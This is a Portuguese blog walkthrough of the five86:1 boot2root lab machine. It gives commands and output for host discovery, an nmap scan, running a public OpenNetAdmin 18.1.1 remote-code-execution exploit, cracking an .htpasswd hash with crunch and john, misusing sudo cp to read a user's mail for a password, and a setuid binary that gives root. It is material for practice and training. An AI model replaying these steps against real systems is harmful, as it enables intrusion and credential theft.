Estou aqui novamente para apresentar mais uma boot2root VM para vocês. Dessa vez lhes trago five86: 1.
Essa máquina foi lançada em 08 de Janeiro de 2020 e o download pode ser realizado em five86:1.
Sem mais delongas, vamos ao que interessa!
Como sempre começamos com o host discovery:
kali@kali:~$ sudo netdiscover -i eth1 -r 192.168.56.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 9 Captured ARP Req/Rep packets, from 3 hosts. Total size: 540 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.56.1 0a:00:27:00:00:14 1 60 Unknown vendor 192.168.56.100 08:00:27:c2:ed:df 3 180 PCS Systemtechnik GmbH192.168.56.112 08:00:27:38:60:aa 5 300 PCS Systemtechnik GmbH
Agora que já identificamos nosso alvo, podemos descobrir quais são os serviços existentes nesse host:
kali@kali:~$sudo nmap -sS -sV -sC -p- 192.168.56.112 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 21:34 EDT Nmap scan report for 192.168.56.112 Host is up (0.00014s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 69:e6:3c:bf:72:f7:a0:00:f9:d9:f4:1d:68:e2:3c:bd (RSA) | 256 45:9e:c7:1e:9f:5b:d3:ce:fc:17:56:f2:f6:42:ab:dc (ECDSA) |_ 256 ae:0a:9e:92:64:5f:86:20:c4:11:44:e0:58:32:e5:05 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-robots.txt: 1 disallowed entry |_/ona |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). 10000/tcp open http MiniServ 1.920 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). MAC Address: 08:00:27:38:60:AA (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.76 seconds kali@kali:~$
Com saída do nmap identificamos uma aplicação web rodando na porta TCP-80 e uma entrada /ona no arquivos robots.txt.
Acessando essa página identificamos o OpenNetAdmin.
Como a própria aplicação já nos avisou que estamos utilizando uma versão desatualizada, vamos tentar achar um algum tipo de exploit para a v18.1.1.
kali@kali:~$ searchsploit OpenNetAdmin ----------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | exploits/php/webapps/47772.rb OpenNetAdmin 18.1.1 - Remote Code Execution | exploits/php/webapps/47691.sh ----------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result kali@kali:~$ searchsploit -p 47691 Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution URL: https://www.exploit-db.com/exploits/47691 Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh File Type: ASCII text, with CRLF line terminators kali@kali:~$
Após copiarmos o exploit para nosso diretório, percebemos que o mesmo está no formato de DOS.
Basta digitarmos no VI o comando :set ff=unix para alterar o formato.
Agora podemos executar o exploit sem maiores problemas.
root@kali:~/exploits# chmod +x 47691.sh root@kali:~/exploits# ./47691.sh http://192.168.56.112/ona/ root@kali:~/exploits# ./47691.sh http://192.168.56.112/ona/ $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $
Procurando todos os arquivos que o usuário www-data é dono…
$ find / type f -user www-data | grep -v /proc /run/lock/apache2 /var/cache/apache2/mod_cache_disk /var/www/html/reports/.htaccess /var/log/ona.log /opt/ona/www/local/config $
identificamos que o acesso ao diretório reports é restrito devido a configuração do htaccess.
$ cat /var/www/html/reports/.htaccess AuthType Basic AuthName "Restricted Area" AuthUserFile /var/www/.htpasswd require valid-user $
Acessando o arquivo htpasswd identificamos a credencial de acesso do usuário douglas. Além disso, identificamos uma dica para criar um dicionário utilizando um tamanho e charset especifico.
$ cat /var/www/.htpasswd douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 # To make things slightly less painful (a standard dictionary will likely fail), # use the following character set for this 10 character password: aefhrt $
Para essa atividade, vamos utilizar o crunch.
root@kali:~# crunch 10 10 aefhrt > pwd.txt Crunch will now generate the following amount of data: 665127936 bytes 634 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 60466176 root@kali:~#
E quebrar a senha com o john.
root@kali:~# john --wordlist=pwd.txt hash.txt Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status fatherrrrr (douglas) 1g 0:00:01:28 DONE (2020-04-05 22:57) 0.01131g/s 245660p/s 245660c/s 245660C/s fatherhara..fatherrtet Use the "--show" option to display all of the cracked passwords reliably Session completed root@kali:~#
Agora basta verificar se houve a reutilização de senha.
root@kali:~# ssh douglas@192.168.56.112 douglas@192.168.56.112's password: Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. douglas@five86-1:~$
Vamos tentar escalonar privilégio para root.
Rapidamente já identificamos que o douglas consegue rodar o comando cp com privilégio do(a) jen.
douglas@five86-1:~$ sudo -l Matching Defaults entries for douglas on five86-1: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User douglas may run the following commands on five86-1: (jen) NOPASSWD: /bin/cp douglas@five86-1:~$
A ideia agora é descobrir se existe algum arquivo do(a) Jen que possamos copiar.
douglas@five86-1:~$ find / type f -user jen 2> /dev/null | grep -Ev "/proc|/sys" /var/mail/jen /home/jen
O e-mail é uma boa opção.
douglas@five86-1:/tmp$ sudo -u jen /bin/cp --no-preserve=all /var/mail/jen mail
Conseguimos identificar a senha do usuário moss no e-mail enviado para jen.
douglas@five86-1:/tmp$ cat mail From roy@five86-1 Wed Jan 01 03:17:00 2020 Return-path: <roy@five86-1> Envelope-to: jen@five86-1 Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500 Received: from roy by five86-1 with local (Exim 4.92) (envelope-from <roy@five86-1>) id 1imZBc-0001FU-El for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500 To: jen@five86-1 Subject: Monday Moss MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1imZBc-0001FU-El@five86-1> From: Roy Trenneman <roy@five86-1> Date: Wed, 01 Jan 2020 03:17:00 -0500 Hi Jen, As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people. But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire! Moss will understand (ha ha ha ha). Tanks, Roy douglas@five86-1:/tmp$ su - moss Password: moss@five86-1:~$
Já autenticado com o usuário moss, Identificamos um diretório de games.
moss@five86-1:~$ ls -la total 12 drwx------ 3 moss moss 4096 Jan 1 23:05 . drwxr-xr-x 7 root root 4096 Jan 1 04:37 .. lrwxrwxrwx 1 moss moss 9 Jan 1 23:05 .bash_history -> /dev/null drwx------ 2 moss moss 4096 Jan 1 03:53 .games
O jogo que nos chamou atenção foi o upyourgame. Pois o mesmo possuí como o owner o usuário root e o bit setuid habilitado.
moss@five86-1:~/.games$ ls -la total 28 drwx------ 2 moss moss 4096 Jan 1 03:53 . drwx------ 3 moss moss 4096 Jan 1 23:05 .. lrwxrwxrwx 1 moss moss 21 Jan 1 03:21 battlestar -> /usr/games/battlestar lrwxrwxrwx 1 moss moss 14 Jan 1 03:23 bcd -> /usr/games/bcd lrwxrwxrwx 1 moss moss 21 Jan 1 03:21 bombardier -> /usr/games/bombardier lrwxrwxrwx 1 moss moss 17 Jan 1 03:22 empire -> /usr/games/empire lrwxrwxrwx 1 moss moss 20 Jan 1 03:23 freesweep -> /usr/games/freesweep lrwxrwxrwx 1 moss moss 15 Jan 1 03:23 hunt -> /usr/games/hunt lrwxrwxrwx 1 moss moss 20 Jan 1 03:22 ninvaders -> /usr/games/ninvaders lrwxrwxrwx 1 moss moss 17 Jan 1 03:19 nsnake -> /usr/games/nsnake lrwxrwxrwx 1 moss moss 25 Jan 1 03:21 pacman4console -> /usr/games/pacman4console lrwxrwxrwx 1 moss moss 17 Jan 1 03:22 petris -> /usr/games/petris lrwxrwxrwx 1 moss moss 16 Jan 1 03:22 snake -> /usr/games/snake lrwxrwxrwx 1 moss moss 17 Jan 1 03:20 sudoku -> /usr/games/sudoku -rwsr-xr-x 1 root root 16824 Jan 1 03:52 upyourgame lrwxrwxrwx 1 moss moss 16 Jan 1 03:22 worms -> /usr/games/worms moss@five86-1:~/.games$
Identificamos via string, que trata-se de um jogo de perguntas e respostas. Porém o mais interessante é a chamado ao /bin/sh no final.
moss@five86-1:~/.games$ strings upyourgame ... Would you like to play a game? Could you please repeat that? Nope, you'll need to enter that again. You entered: No. Is this correct? We appear to have a problem? Do we have a problem? Made in Britain. /bin/sh ;*3$" ...
Logo…
moss@five86-1:~/.games$ ./upyourgame Would you like to play a game? no Could you please repeat that? no Nope, you'll need to enter that again. no You entered: No. Is this correct? no We appear to have a problem? Do we have a problem? no Made in Britain. # id uid=0(root) gid=1001(moss) groups=1001(moss) #
# cd /root # ls flag.txt # cat flag.txt 8f3b38dd95eccf600593da4522251746 #
Referências:
https://til.hashrocket.com/posts/hu3jlszfrf-change-dos-to-unix-text-file-format-in-vim
Um comentário em “five86: 1”